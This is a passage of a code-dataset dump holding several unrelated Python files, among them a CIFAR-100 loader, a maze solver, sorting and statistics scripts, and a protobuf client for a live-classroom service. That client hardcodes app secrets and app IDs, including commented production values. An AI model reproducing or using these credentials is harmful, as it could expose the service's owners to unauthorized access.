tf\nimport numpy as np\n\nfrom utils.utils import get_args\nfrom utils.config import process_config\n\n\nclass Cifar100DataLoaderNumpy:\n \"\"\"\n It will load the numpy files from the pkl file which is dumped by prepare_cifar100.py script\n Please make sure that you have included all of the needed config\n \"\"\"\n\n def __init__(self, config):\n self.config = config\n\n with open('../data/cifar100/cifar-100-python/data_numpy.pkl', 'rb') as f:\n self.data_pkl = pickle.load(f)\n\n self.x_train = self.data_pkl['x_train']\n self.y_train = self.data_pkl['y_train']\n self.x_test = self.data_pkl['x_test']\n self.y_test = self.data_pkl['y_test']\n\n print('x_train: ', self.x_train.shape, self.x_train.dtype)\n print('y_train: ', self.y_train.shape, self.y_train.dtype)\n print('x_test: ', self.x_test.shape, self.x_test.dtype)\n print('y_test: ', self.y_test.shape, self.y_test.dtype)\n\n self.train_len = self.x_train.shape[0]\n self.test_len = self.x_test.shape[0]\n\n self.num_iterations_train = (self.train_len + self.config.batch_size - 1) // self.config.batch_size\n self.num_iterations_test = (self.test_len + self.config.batch_size - 1) // self.config.batch_size\n\n print('Data loaded successfully..')\n\n self.features_placeholder = None\n self.labels_placeholder = None\n\n self.dataset = None\n self.iterator = None\n self.init_iterator_op = None\n self.next_batch = None\n\n self._build_dataset_api()\n\n\n def _build_dataset_api(self):\n with tf.device('/cpu:0'):\n self.features_placeholder = tf.placeholder(tf.float32, [None] + list(self.x_train.shape[1:]))\n self.labels_placeholder = tf.placeholder(tf.int64, [None, ])\n\n self.dataset = tf.data.Dataset.from_tensor_slices((self.features_placeholder, self.labels_placeholder))\n self.dataset = self.dataset.batch(self.config.batch_size)\n\n self.iterator = tf.data.Iterator.from_structure(self.dataset.output_types,\n self.dataset.output_shapes)\n\n self.init_iterator_op = self.iterator.make_initializer(self.dataset)\n\n self.next_batch = self.iterator.get_next()\n\n print('X_batch shape dtype: ', self.next_batch[0].shape)\n print('Y_batch shape dtype: ', self.next_batch[1].shape)\n\n\n def initialize(self, sess, mode='train'):\n if mode == 'train':\n idx = np.random.choice(self.train_len, self.train_len, replace=False)\n self.x_train = self.x_train[idx]\n self.y_train = self.y_train[idx]\n\n print(self.x_train.shape)\n print(self.y_train.shape)\n sess.run(self.init_iterator_op, feed_dict={self.features_placeholder: self.x_train,\n self.labels_placeholder: self.y_train})\n else:\n sess.run(self.init_iterator_op, feed_dict={self.features_placeholder: self.x_test,\n self.labels_placeholder: self.y_test})\n\n\n def get_inputs(self):\n return self.next_batch\n\n\ndef main(config):\n \"\"\"\n Function to test from console\n :param config:\n :return:\n \"\"\"\n tf.reset_default_graph()\n\n sess = tf.Session()\n\n data_loader = Cifar100DataLoaderNumpy(config)\n\n x, y = data_loader.get_inputs()\n\n print('Train')\n data_loader.initialize(sess, mode='train')\n\n out_x, out_y = sess.run([x, y])\n\n print(out_x.shape, out_x.dtype)\n print(out_y.shape, out_y.dtype)\n\n print('Test')\n data_loader.initialize(sess, mode='test')\n\n out_x, out_y = sess.run([x, y])\n\n print(out_x.shape, out_x.dtype)\n print(out_y.shape, out_y.dtype)\n\n\nif __name__ == '__main__':\n # capture the config path from the run arguments\n # then process the json configuration file\n try:\n args = get_args()\n config = process_config(args.config)\n main(config)\n\n except Exception as e:\n print('Missing or invalid arguments %s' % e)\n","sub_path":"data_generators/generator_cifar100.py","file_name":"generator_cifar100.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"239959114","text":"#!/usr/bin/env python\n\nimport SimpleHTTPServer\nimport SocketServer\nimport random\n\ndef page(v):\n return '''\n\n\ncolor\n\n\n\n''' + v + '''\n\n\n'''\n\ndef main():\n handler = SimpleHTTPServer.SimpleHTTPRequestHandler\n server = SocketServer.TCPServer(('0.0.0.0', 80), handler)\n\n while ( 1 ):\n color = '#%06X' %(random.randint(0,255**3-1))\n content = '
%s
' %(color,color)\n\n f = open('index.html', 'w')\n f.write(page(content))\n f.close()\n\n server.handle_request()\n\nif __name__ == '__main__':\n main()\n","sub_path":"color.py","file_name":"color.py","file_ext":"py","file_size_in_byte":642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"405790613","text":"# _*_ coding:utf-8 _*_\r\n\r\nimport socket\r\nimport time\r\nfrom commons.liveServiceMonitor.kodec import msg_type_pb2, logical_pb2\r\nfrom commons.liveServiceMonitor.public import addMd5\r\nfrom commons.liveServiceMonitor.public import IPConver\r\nimport struct\r\nimport random\r\nimport platform\r\nfrom commons.liveServiceMonitor.public import globalvar\r\n#from commons.liveServiceMonitor.public.logger import logger\r\n\r\n\r\n#测试环境常量\r\napp_secret = '4911898908f9d03ae7bf913f2ae16cb1'\r\napp_id = '58eee6ac19b005fec0d848ce'\r\n\r\n#正式环境常量\r\n# app_secret = 'ea4958b53cd9da924e1223252d5d215b'\r\n# app_id = '59a91c3237d3d8d28516801c'\r\n\r\n#### 加入直播间\r\nclass JoinRoom(object):\r\n def __init__(self, liveId, userId, nickName, userType, roomIndex, app_id, app_secret):\r\n self.liveId = liveId\r\n self.userId = userId\r\n self.nickName = nickName\r\n self.userType = userType\r\n self.roomIndex = roomIndex\r\n self.appId = app_id\r\n self.appSecret = app_secret\r\n self.join_token = \"\"\r\n self.isForbidden = False\r\n self.chatDisabled = False\r\n self.groupChatDisabled = False\r\n # 新增加入房间请求、加入房间响应时间\r\n self.join_req_time = 0\r\n self.join_res_time = 0\r\n # 新增重新加入房间请求&响应时间\r\n self.rejoin_req_time = 0\r\n self.rejoin_res_time = 0\r\n # 初始化响应时间间隔\r\n self.join_duration = 0\r\n self.rejoin_duration = 0\r\n\r\n # 组建join请求\r\n def pack_joinReq(self):\r\n reqPack = logical_pb2.RequestPackage()\r\n commFrame = reqPack.head_frame\r\n commFrame.msg_type = msg_type_pb2.JOIN_ROOM_REQ\r\n commFrame.msg_no = 'wk_test_' + str(random.randint(1, 99999)) # 暂时采用随机数\r\n commFrame.msg_from_user_id = self.userId # 12976231 老师ID\r\n commFrame.msg_to_user_id = \"\"\r\n commFrame.device_type = 0 ## 设备类型,0 pc 1 ios 2 android 3 手机网页 4 pc网页\r\n commFrame.version = 101001301\r\n # commFrame.timestamp = int(time.time() * 1000)\r\n commFrame.ip = IPConver.ip2int(socket.gethostbyname(socket.gethostname()))\r\n\r\n ## 客户端系统和版本信息\r\n commFrame.client_info.os_name = platform.system()\r\n commFrame.client_info.os_version = platform.win32_ver()[0]\r\n commFrame.client_info.client_version = \"wkai2133\"\r\n commFrame.extended_fields['from'] = 'multiuser_test'\r\n\r\n # 设置请求包是否压缩标志,0 不压缩,1 压缩\r\n msg_flag = int('0x0000', 16)\r\n\r\n join_Room_message = logical_pb2.RequestMessage()\r\n joinRoom = join_Room_message.join_room\r\n joinRoom.nickname = self.nickName\r\n joinRoom.user_id = self.userId\r\n joinRoom.avatar_url = 'https://cdn.17xueba.com//pro/server/image/2018/01/20180122134340183387.png'\r\n joinRoom.live_id = self.liveId\r\n joinRoom.user_type = self.userType # 可选值 1学生,2助教,3老师\r\n joinRoom.room_index = self.roomIndex\r\n joinRoom.timestamp = int(time.time() * 1000)\r\n joinRoom.app_id = self.appId\r\n\r\n # 将所有参数赋值给字典变量,计算签名\r\n para_dict = dict()\r\n para_dict['nickname'] = joinRoom.nickname\r\n para_dict['user_id'] = joinRoom.user_id\r\n para_dict['avatar_url'] = joinRoom.avatar_url\r\n para_dict['live_id'] = joinRoom.live_id\r\n para_dict['user_type'] = joinRoom.user_type\r\n para_dict['room_index'] = joinRoom.room_index\r\n para_dict['timestamp'] = joinRoom.timestamp\r\n para_dict['app_id'] = joinRoom.app_id\r\n joinRoom.sign = addMd5.addSign(para_dict, self.appSecret)\r\n\r\n # 对RequestPackage请求数据包进行序列化\r\n reqPack.logical_frame = join_Room_message.SerializeToString()\r\n joinReqPack = reqPack.SerializeToString()\r\n\r\n # 计算请求封包的长度\r\n msg_len = reqPack.ByteSize() + 2\r\n joinReq_message = struct.pack('!IH', msg_len, msg_flag) + joinReqPack\r\n return joinReq_message\r\n\r\n # 组建re_join请求\r\n def pack_rejoin(self, token):\r\n reqPack = logical_pb2.RequestPackage()\r\n commFrame = reqPack.head_frame\r\n commFrame.msg_type = msg_type_pb2.RE_JOIN_REQ\r\n commFrame.msg_no = 'wk_test_' + str(random.randint(1, 99999)) # 暂时采用随机数\r\n commFrame.msg_from_user_id = self.userId\r\n commFrame.msg_to_user_id = \"\"\r\n commFrame.device_type = 0\r\n commFrame.version = 101000012\r\n # commFrame.timestamp = int(time.time() * 1000)\r\n commFrame.ip = IPConver.ip2int(socket.gethostbyname(socket.gethostname()))\r\n commFrame.client_info.os_name = \"windows\"\r\n commFrame.client_info.client_version = \"wkai2133\"\r\n commFrame.extended_fields['from'] = 'multiuser_test'\r\n\r\n # 设置请求包是否压缩标志,0 不压缩,1 压缩\r\n msg_flag = int('0x0000', 16)\r\n\r\n rejoin_message = logical_pb2.RequestMessage()\r\n rejoin_message.token = token\r\n joinRoom = rejoin_message.re_join\r\n\r\n # 对RequestPackage请求数据包进行序列化\r\n reqPack.logical_frame = rejoin_message.SerializeToString()\r\n rejoin_pack = reqPack.SerializeToString()\r\n\r\n # 计算请求封包的长度\r\n msg_len = reqPack.ByteSize() + 2\r\n final_message = struct.pack('!IH', msg_len, msg_flag) + rejoin_pack\r\n return final_message\r\n\r\n # 更改直播状态封包\r\n def pack_statusChange(self, token, liveStatus):\r\n reqPack = logical_pb2.RequestPackage()\r\n reqCommFrame = reqPack.head_frame\r\n reqCommFrame.msg_type = msg_type_pb2.LIVE_STATUS_CHANGE_REQ\r\n reqCommFrame.msg_no = 'wk_tt_' + str(random.randint(1, 99999)) # 采用随机数\r\n reqCommFrame.msg_from_user_id = self.userId\r\n reqCommFrame.msg_to_user_id = \"\"\r\n reqCommFrame.device_type = 0 ### 设备类型,0 pc 1 ios 2 android 3 手机网页 4 pc网页\r\n reqCommFrame.version = 101000012\r\n # reqCommFrame.timestamp = int(time.time() * 1000)\r\n reqCommFrame.ip = IPConver.ip2int(socket.gethostbyname(socket.gethostname()))\r\n reqCommFrame.client_info.os_name = \"windows\"\r\n reqCommFrame.client_info.client_version = \"wkai2133\"\r\n reqCommFrame.extended_fields['from'] = 'multiuser_test'\r\n\r\n # 构造请求逻辑帧\r\n req_message = logical_pb2.RequestMessage()\r\n req_message.token = token\r\n reqBody = req_message.live_status_change\r\n reqBody.status = liveStatus\r\n\r\n # 对答题请求数据包进行序列化\r\n reqPack.logical_frame = req_message.SerializeToString()\r\n reqMessage = reqPack.SerializeToString()\r\n\r\n Msg_flag = int('0x0000', 16)\r\n # 计算请求封包的长度\r\n Msg_len = reqPack.ByteSize() + 2\r\n changeMessage = struct.pack('!IH', Msg_len, Msg_flag) + reqMessage\r\n return changeMessage\r\n\r\n # 获取直播配置信息封包\r\n def pack_getLiveconfig(self, token):\r\n reqPack = logical_pb2.RequestPackage()\r\n reqCommFrame = reqPack.head_frame\r\n reqCommFrame.msg_type = msg_type_pb2.GET_LIVE_CONFIG_REQ\r\n reqCommFrame.msg_no = 'wk_tt_' + str(random.randint(1, 99999)) # 采用随机数\r\n reqCommFrame.msg_from_user_id = self.userId\r\n reqCommFrame.msg_to_user_id = \"\"\r\n reqCommFrame.device_type = 0 ### 设备类型,0 pc 1 ios 2 android 3 手机网页 4 pc网页\r\n reqCommFrame.version = 101000012\r\n # reqCommFrame.timestamp = int(time.time() * 1000)\r\n reqCommFrame.ip = IPConver.ip2int(socket.gethostbyname(socket.gethostname()))\r\n reqCommFrame.client_info.os_name = \"windows\"\r\n reqCommFrame.client_info.client_version = \"wkai2133\"\r\n reqCommFrame.extended_fields['from'] = 'multiuser_test'\r\n\r\n # 构造请求逻辑帧\r\n req_message = logical_pb2.RequestMessage()\r\n req_message.token = token\r\n reqBody = req_message.get_live_config\r\n\r\n # 对答题请求数据包进行序列化\r\n reqPack.logical_frame = req_message.SerializeToString()\r\n reqMessage = reqPack.SerializeToString()\r\n\r\n Msg_flag = int('0x0000', 16)\r\n # 计算请求封包的长度\r\n Msg_len = reqPack.ByteSize() + 2\r\n getconfigMessage = struct.pack('!IH', Msg_len, Msg_flag) + reqMessage\r\n return getconfigMessage\r\n\r\n def joinLogic(self, resData):\r\n if resData.result_frame.code == 0:\r\n if resData.head_frame.msg_type == msg_type_pb2.JOIN_ROOM_RES:\r\n # 设置加入教室响应时间戳\r\n self.join_res_time = int(time.time() * 1000)\r\n # 计算加入教室响应时间\r\n self.join_duration = self.join_res_time - self.join_req_time\r\n # 将老师加入房间时间添加到全局字典变量\r\n #globalvar.set_value(self.userId,{'teacher_join_duration': self.join_duration})\r\n globalvar.update_value(self.userId, {'teacher_join_duration': self.join_duration})\r\n print(\"老师加入教室(join_room)成功!\")\r\n print('老师:{}, 加入教室响应耗时(毫秒): {}'.format(self.userId, self.join_duration))\r\n #logger.info('老师:{}, 加入教室响应耗时(毫秒): {}'.format(self.userId, self.join_duration))\r\n print(\"直播状态:\", resData.logical_frame.join_room.live_status)\r\n self.join_token = resData.logical_frame.join_room.token\r\n self.isForbidden = resData.logical_frame.join_room.is_forbidden\r\n self.chatDisabled = resData.logical_frame.join_room.chat_disabled\r\n self.groupChatDisabled = resData.logical_frame.join_room.group_chat_disabled\r\n return self.join_token\r\n elif resData.head_frame.msg_type == msg_type_pb2.RE_JOIN_RES:\r\n # 设置重新加入教室响应时间\r\n self.rejoin_res_time = int(time.time() * 1000)\r\n # 计算加入教室响应时间\r\n self.rejoin_duration = self.rejoin_res_time - self.rejoin_req_time\r\n # 将老师加入房间时间添加到全局字典变量\r\n # globalvar.set_value(self.userId,{'teacher_join_duration': self.join_duration})\r\n globalvar.update_value(self.userId, {'re_join_duration': self.rejoin_duration})\r\n print(\"老师重新加入教室(re_join)成功!\")\r\n print('老师:{}, 重新加入教室响应耗时(毫秒): {}'.format(self.userId, self.rejoin_duration))\r\n #logger.info('老师:{}, 重新加入教室响应耗时(毫秒): {}'.format(self.userId, self.rejoin_duration))\r\n print(\"直播状态:\", resData.logical_frame.join_room.live_status)\r\n self.join_token = resData.logical_frame.re_join.token\r\n self.isForbidden = resData.logical_frame.re_join.is_forbidden\r\n self.chatDisabled = resData.logical_frame.re_join.chat_disabled\r\n self.groupChatDisabled = resData.logical_frame.re_join.group_chat_disabled\r\n return self.join_token\r\n # 获取直播配置\r\n elif resData.head_frame.msg_type == msg_type_pb2.GET_LIVE_CONFIG_RES:\r\n self.live_config = resData.logical_frame.get_live_config_res\r\n else:\r\n print(resData.result_frame.code, resData.result_frame.msg)\r\n","sub_path":"liveTest/simulateSever/liveServiceMonitor/logical_teach/TJoinRoom.py","file_name":"TJoinRoom.py","file_ext":"py","file_size_in_byte":11565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"12518824","text":"#Advent of Code 2019 Day 18\n\nfrom collections import deque, defaultdict\nimport string\nimport heapq\n\nf = open('C:/Users/Simon/SkyDrive/Home Stuff/Python/Advent of Code/2019/2019-18b.txt')\ncontents = f.read()\ninput=contents.splitlines()\n\nclass Maze(): #Overall class for maze containing map, keys and doors\n \n def __init__(self,input): #Convert input into map and units\n self.map={}\n self.paths=defaultdict(dict)\n self.w=len(input[0])\n self.h=len(input)\n lCase='0123'+string.ascii_lowercase #List for entrances and keys\n uCase=string.ascii_uppercase #List for doors\n self.keyPositions={}\n self.doorPositions={}\n self.keyNames=set()\n self.doorNames=set()\n self.shortestBetweenKeys=float('Inf')\n \n for j in range(self.h):\n for i in range(self.w):\n x=input[j][i]\n pos=complex(i,j)\n if x in lCase: #Add entries to lookup key from position, or position from key\n self.keyNames.add(x)\n self.keyPositions[x]=pos\n elif x in uCase: #Add entries to lookup door from position, or position from door\n self.doorNames.add(x)\n self.doorPositions[x]=pos\n self.map[pos]=x\n \n self.nKeys=len(self.keyNames)\n self.findDistances()\n \n def findDistances(self): #Run BFS search to find min distances and doors to get to/from each key\n starts=''.join(sorted(self.keyNames)) #List of starting points of each leg, consisting of the entrances '0123' and each key\n for s in starts:\n ends=set(starts[starts.index(s)+1:]) #Paths are reversible so we only need to check ends that are after start in the list\n queue=deque() #BFS queue\n queue.appendleft(BFSNode(self.keyPositions[s],0,set(),set()))\n visited=set() #Track set of visited points, to avoid backtracking\n while len(queue)>0 and len(ends)>0:\n current=queue.pop()\n pos=current.pos\n visited.add(pos)\n tile=self.map[pos]\n if tile in self.doorNames: #If current position is a door, add it to node\n current.addDoor(tile)\n elif tile in ends: #If current position is a key endpoint, create a path object and add to paths dict\n path=Path(s,tile,current.dist,current.doors.copy(),current.keys.copy())\n self.paths[s][tile]=path\n self.paths[tile][s]=path\n if current.dist0:# and n<1000:\n node=heapq.heappop(openHeap) #Examine node in open heap with lowest f\n if node.__hash__() in closedSet:\n continue #If state has been seen before, skip\n closedSet.add(node.__hash__())\n n+=1\n if n%1000==1:\n print(str(n)+': Current node '+str(node))\n if node.h==0: #Check if current node is solution\n print(str(n)+': Solution node '+str(node))\n return(node)\n #Otherwise expand node\n remainingKeys=self.keyNames-node.found\n for dest in remainingKeys: #For each unvisited key, check whether the path is blocked by any locked doors\n for i in range(4): #Find which of the 4 bots has the key in its quadrant\n if str(i) in self.paths[dest]:\n botNum=i\n break\n path=self.paths[node.keys[botNum]][dest]\n valid=True #Tracker for valid path (path with no locked doors or uncollected keys in the way\n for door in path.doors:\n if door.lower() not in node.found: #If a locked door is found, set valid to False and stop checking\n valid=False\n break\n if valid:\n for key in path.keys:\n if key not in node.found: #If an uncollected key is found in the middle of the path, set valid to False and stop checking\n valid=False\n break\n if valid: #If path is valid, create child node\n childKeys=node.keys.copy()\n childKeys[botNum]=dest\n childFound=node.found.copy()\n childFound.add(dest)\n childPath=node.path+dest\n child=AStarNode(self,node.g+path.dist,childKeys,childFound,childPath)\n if child.__hash__() not in closedSet:\n heapq.heappush(openHeap,child)\n \n \n print('Nodes exhausted, no solution found')\n \n \nclass Path(): #Path between two keys (or entrance to a key)\n def __init__(self,start,end,dist,doors,keys):\n self.start=start\n self.end=end\n self.dist=dist\n self.doors=doors\n self.keys=keys \n \n def __repr__(self):\n return(str(self.start)+' to '+str(self.end)+' dist='+str(self.dist)+' Doors: '+str(self.doors)+ ' Keys: '+str(self.keys))\n\nclass BFSNode(): #Node for BFS\n def __init__(self,pos,dist,doors,keys):\n self.pos=pos\n self.dist=dist\n self.doors=doors\n self.keys=keys\n \n def addDoor(self,door): #Add door to set of doors visited by node\n self.doors.add(door)\n \n def addKey(self,key): #Add key to set of keys visited by node\n self.keys.add(key)\n \nclass AStarNode(): #Node for A*\n \n def __init__(self,maze,dist,keys,found,path):\n\n self.maze = maze\n self.keys = keys #List of 4 current keys/entrances\n self.found=found #Set of all keys found so far\n self.path=path #String path of keys found so far\n\n self.g = dist #Distance travelled by bots so far\n self.h = self.nodeH()\n self.f = self.g+self.h\n \n self.status=(self.keys,self.found) #Node status\n \n def nodeH(self): #Heuristic consisting of the minimum possible distance to end - minimum key-to-key distance in maze multiplied by number of keys left to find\n nLeft=len(self.maze.keyNames)-len(self.found)\n return(nLeft*self.maze.shortestBetweenKeys)\n\n def __eq__(self, other):\n return self.status == other.status\n \n def __lt__(self, other):\n return(self.f>>b1 = b.dimshuffle('x',0,'x','x')\n# >>>b1.shape.eval()\n# array([1,2,1,1])\noutput = T.nnet.sigmoid(conv_out + b.dimshuffle('x',0,'x','x'))\nf = theano.function([input],output)","sub_path":"pytest/pylab.py","file_name":"pylab.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"99194891","text":"\"\"\"\nMDL Mol Updating Utilities\n==========================\n\n\"\"\"\n\nimport rdkit.Chem.AllChem as rdkit\n\nfrom stk.utilities import remake\n\n\ndef _with_structure_from_mol(self, path):\n \"\"\"\n Change structure to match a ``.mol`` file.\n\n Parameters\n ----------\n path : :class:`str`\n The full path of the ``.mol`` file from which the structure\n should be updated.\n\n Returns\n -------\n :class:`.Molecule`\n The molecule.\n\n \"\"\"\n\n molecule = remake(\n rdkit.MolFromMolFile(\n molFileName=path,\n sanitize=False,\n removeHs=False,\n )\n )\n return self._with_position_matrix(\n position_matrix=molecule.GetConformer().GetPositions()\n )\n","sub_path":"src/stk/molecular/molecules/molecule/utilities/updaters/mdl_mol.py","file_name":"mdl_mol.py","file_ext":"py","file_size_in_byte":725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"58196550","text":"def multiple_sep_split(string,maxsplit, spacealso,args):\n \"\"\"Call the function as multiple_sep_split(,,,)\"\"\"\n return_list = []\n final_list = []\n args_list = []\n args_list.extend(args)\n #first we do a split with ' '\n if(spacealso == 1):\n args_list.append(args_list[0])\n args_list[0]=' '\n if maxsplit > 0:\n prev_split=0\n split_count=0\n for i in range(len(string)):\n if string[i] in args_list:\n return_list.append(string[prev_split:i])\n prev_split=i+1\n split_count = split_count+1\n if split_count == maxsplit: \n break\n if prev_split != len(string):\n return_list.append(string[prev_split:])\n else:\n prev_split=0\n for i in range(len(string)):\n if string[i] in args_list:\n return_list.append(string[prev_split:i])\n prev_split=i+1\n if prev_split != len(string):\n return_list.append(string[prev_split:])\n #removing blank members.\n for val in return_list:\n if val != '':\n final_list.append(val)\n\n return final_list\n\n\ndef count_words(path):\n separators = (',','.',':',';','/','\\\\','(',')','{','}','<','>','?','\"','\\'','\\n','\\t')\n fileh = file(path)\n words = multiple_sep_split(fileh.read(), -1, 1, separators)\n word_count_dict={}\n #print words\n for value in words:\n word_count_dict[value] = word_count_dict.get(value, 0)+1\n return word_count_dict\n ","sub_path":"doc_word_count.py","file_name":"doc_word_count.py","file_ext":"py","file_size_in_byte":1686,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"506504258","text":"__author__ = 'LJJ'\n__date__ = '2019/6/12 下午4:11'\n\n\ndef quick_sort(arr):\n \"\"\"\n 快速排序,采用分治法+递归\n :param arr:\n :return: sorted_arr\n \"\"\"\n if len(arr) >= 2:\n pivot_mid = arr[len(arr)//2] # 选取中间值为基准值\n left = []\n right = []\n arr.remove(pivot_mid) # 移除基准值\n for num in arr:\n if num > pivot_mid:\n right.append(num)\n else:\n left.append(num)\n return quick_sort(left) + [pivot_mid] + quick_sort(right)\n else:\n return arr\n\n\ndef quick_sort_parti(arr):\n \"\"\"\n 原地排序版本\n :param arr:\n :return: new_arr\n \"\"\"\n arr = arr[:]\n n = len(arr)\n\n def partition(arr, start, end):\n \"\"\"\n 取基准点\n :param arr:\n :param start:\n :param end:\n :return:\n \"\"\"\n i = start - 1\n pivot_index = end\n pivot = arr[end]\n for j in range(start, end):\n if arr[j] < pivot:\n i = i + 1\n arr[i], arr[j] = arr[j], arr[i]\n arr[i+1], arr[pivot_index] = arr[pivot_index], arr[i+1]\n return i + 1\n\n def sort(arr, start, end):\n \"\"\"\n 进行递归排序\n :param arr:\n :param start:\n :param end:\n :return:\n \"\"\"\n if start >= end:\n return\n p = partition(arr, start, end)\n sort(arr, start, p-1)\n sort(arr, p+1, end)\n sort(arr, 0, n-1)\n return arr\n\nif __name__ == '__main__':\n arr = [3,7,1,4,6,15,5,2,7,9,10,15,9,17,12]\n # print(quick_sort(arr))\n print(quick_sort_parti(arr))\n\n\n","sub_path":"quick_sort.py","file_name":"quick_sort.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"642712277","text":"import csv \r\nimport numpy as np \r\n\r\ndef getDataSource(data_path):\r\n mark=[]\r\n day=[]\r\n with open(data_path)as csv_file:\r\n csv_reader=csv.DictReader(csv_file)\r\n for row in csv_reader:\r\n mark.append(float(row[\"Marks In Percentage\"]))\r\n day.append(float(row[\"Days Present\"]))\r\n return{\"x\":mark,\"y\":day}\r\n\r\ndef findCorrelation(dataSource):\r\n correlation=np.corrcoef(dataSource[\"x\"],dataSource[\"y\"])\r\n print(\"Correlation betwen Marks and Sleep in hours \",correlation[0,1])\r\n\r\ndef setUp():\r\n data_path=\"Marks.csv\"\r\n dataSource=getDataSource(data_path)\r\n findCorrelation(dataSource)\r\n\r\n\r\nsetUp()\r\n","sub_path":"CORRELATION1/marks.py","file_name":"marks.py","file_ext":"py","file_size_in_byte":653,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"5933733","text":"import re\nimport math\nimport sys\n\nclass location(object):\n def __init__(self):\n self.name = ''\n self.x = 0\n self.y = 0\n self.neighbors = []\n \nclass world(object):\n def __init__(self):\n self.name = ''\n self.locations = {}\n self.names = set()\n self.blocked_route = [set(('Austin-TX', 'Miami-FL')), set(('Washington_DC', 'Baltimore-MD')), set(('Ann_Arbor-MI', 'St_Louis-MO')),\n set(('Vancouver-BC', 'Raleigh-NC')), set(('Atlanta-GA', 'Miami-Fl'))]\n \n def read_locations(self, fname):\n f = open(fname, 'r')\n print (\"Opening location file\",fname)\n line = f.readline()\n while line:\n cmdlist = re.findall(r'[\\S]+', line)\n if len(cmdlist) > 0:\n newLocation = location();\n newLocation.name = cmdlist[0]\n self.names.add(cmdlist[0])\n newLocation.x = float(cmdlist[1])\n newLocation.y = float(cmdlist[2])\n self.locations[cmdlist[0]] = newLocation\n #print \"Read location %s\" % newLocation.name\n line = f.readline()\n f.close()\n print (\"Finished reading location file\")\n\n def input_trip(self, clist, blocked = False):\n ind = 0\n distT = 0\n floc = ''\n oloc = location()\n traveled = set()\n \n \n for cloc in clist:\n if ind > 0:\n dist = get_distance(cloc, oloc)\n distT = distT + dist\n else:\n floc = cloc\n current_route = set((cloc.name, oloc.name))\n if blocked:\n if current_route in self.blocked_route:\n return 'Entered a blocked route!'\n oloc = cloc\n if cloc.name in traveled:\n if cloc.name != floc.name:\n print(cloc.name, floc.name)\n return 'Traveled to a city already visited!'\n else:\n break\n else:\n traveled.add(cloc.name)\n print(\"{0:<36}\".format('Current city is: ' +oloc.name+',')+\"and current distance is %.1f miles\" %(distT))\n ind = ind + 1\n print (\"{0:<36}\".format(\"Total distance: \") + str(distT))\n if (traveled != self.names):\n print(\"Did not travel to all cities!\")\n else:\n print(\"Visited all cities!\")\n if (floc.name != cloc.name):\n print(\"Obama didn't return to his starting position!\")\n else:\n print(\"Obama returned to his starting position!\")\n \ndef get_distance_xy(x1, y1, x2, y2):\n return 500*math.sqrt((x2-x1)*(x2-x1)+(y2-y1)*(y2-y1))/150\n\ndef get_distance(loc1, loc2):\n return get_distance_xy(loc1.x, loc1.y, loc2.x, loc2.y)\n","sub_path":"02 - Algorithms/Travelling_Salesman/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":2838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"597335080","text":"__author__ = 'ssamaddar'\nclass File(object):\n\n def __init__(self,name):\n\n self.name = name\n self.type = \"file\"\n self.extension = input(\"What type of file is it?(.exe,.msi...)\")\n self.path = input(\"Where is it?\")\n self.alias = input(\"Is it called something else as well?\").split(\",\")\n self.associated = input(\"What programs are associated with this file?(, for more than 1)\").split(\",\")\n\n\n print (self.name)\n print(self.type)\n print (self.extension)\n print(self.path)\n print (self.alias)\n print(self.associated)","sub_path":"file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"484992292","text":"from SpiderDBClient import SpiderDBClient\nimport ast\n\n\nclass HouseSpiderDBClient(SpiderDBClient):\n\n def format_data(self, house_info):\n [zone, link, surface, house_brief, house_detail] = house_info.split(\"||\")\n house_info_db_dict = {\"zone\":zone, \"link\":link, \"surface\":surface, \"house_brief\":house_brief, \"house_detail\":{}}\n house_detail_dict = ast.literal_eval(house_detail)\n for key, value in house_detail_dict.iteritems():\n house_info_db_dict[\"house_detail\"][key] = value\n return house_info_db_dict\n","sub_path":"DAO/HouseSpiderDBClient.py","file_name":"HouseSpiderDBClient.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"441333695","text":"\"\"\"\nCopyright (C) 2016 Julien Durand\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\"\"\"\n\nimport numpy as np\n\ncity_db_path = 'index/cities.dat'\nstreet_db_path = 'index/streets.dat'\nlocality_db_path = 'index/localities.dat'\nnumber_db_path = 'index/numbers.dat'\ncities_post_index_path = 'index/cities_post_index.dat'\nstreets_insee_index_path = 'index/streets_insee_index.dat'\nlocalities_insee_index_path = 'index/localities_insee_index.dat'\nnumbers_locality_index_path = 'index/numbers_locality_index.dat'\nnumbers_geohash_index_path = 'index/numbers_geohash_index.dat'\n\ncity_dtype = np.dtype([\n ('code_insee', 'a5'),\n ('code_post', 'a5'),\n ('nom_commune', 'a45'),\n ('lon', 'int32'),\n ('lat', 'int32'),\n])\n\nstreet_dtype = np.dtype([\n ('street_id', 'int32'),\n ('code_insee', 'a5'),\n ('code_post', 'a5'),\n ('nom_voie', 'a32'),\n])\n\n# 'lieu-dit' in french\nlocality_dtype = np.dtype([\n ('locality_id', 'int32'),\n ('code_insee', 'a5'),\n ('code_post', 